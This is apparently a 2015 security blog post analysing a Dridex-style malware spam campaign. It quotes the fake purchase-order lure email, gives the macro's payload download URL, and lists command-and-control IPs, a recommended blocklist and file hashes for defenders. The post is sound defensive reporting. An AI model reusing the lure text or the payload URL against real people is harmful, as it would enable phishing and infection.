Malware spam: "Your PO: SP14619" / "Sam S. [sales@alicorp.com]"

This fake financial spam comes with a malicious attachment:

From:    Sam S. [sales@alicorp.com]
Date:    31 March 2015 at 07:45
Subject:    Your PO: SP14619

Your PO No: SP14619 for a total of $ 13,607.46
has been sent to New Era Contract Sales Inc. today.

A copy of the document is attached

Regards,
New Era Contract Sales Inc.'s Document Exchange Team
In the sample I have seen, the attachment is APIPO1.doc with a VirusTotal detection rate of 5/56, and it contains this malicious macro [pastebin] which downloads a component from:

http://xianshabuchang.com/54/78.exe

which is saved as %TEMP%\kkaddap7b.exe. This malicious executable has a detection rate of 3/56. Various analysis tools [1] [2] [3] show that it phones home to the following IPs:

91.230.60.219 (Docker Ltd / ArtVisio Ltd, Russia)
185.91.175.39 (Webstyle Group LLC / Rohoster / MnogoByte, Russia)
46.101.38.178 (Digital Ocean, Netherlands)
87.236.215.103 (OneGbits, Lithuania)
66.110.179.66 (Microtech Tel, US)
176.108.1.17 (Cadr-TV LLE TVRC, Ukraine)
202.44.54.5 (World Internetwork Corporation, Thailand)
128.199.203.165 (DigitalOcean Cloud, Singapore)

According to the Malwr report it drops another version of itself called edg1.exe [VT 2/56] and what appears to be a Dridex DLL [VT 3/56].

Recommended blocklist:
91.230.60.0/24
185.91.175.0/24
46.101.38.178
87.236.215.103
66.110.179.66
176.108.1.17
202.44.54.5
128.199.203.165

MD5s:
f5ecc500c2b74612e33c0522104fb999
716d1dc7285b017c2dbc146dbb2e319c
2cb0f18ba030c1ab0ed375e4ce9c0342
6218264a6677a37f7e98d8c8bd2c13e9

UPDATE:
A couple of reports from Payload Security [1] [2]  also give some insight into the malware, including an additional but well-known IP to block:

95.163.121.178 (Digital Networks CJSC aka DINETHOSTING, Russia)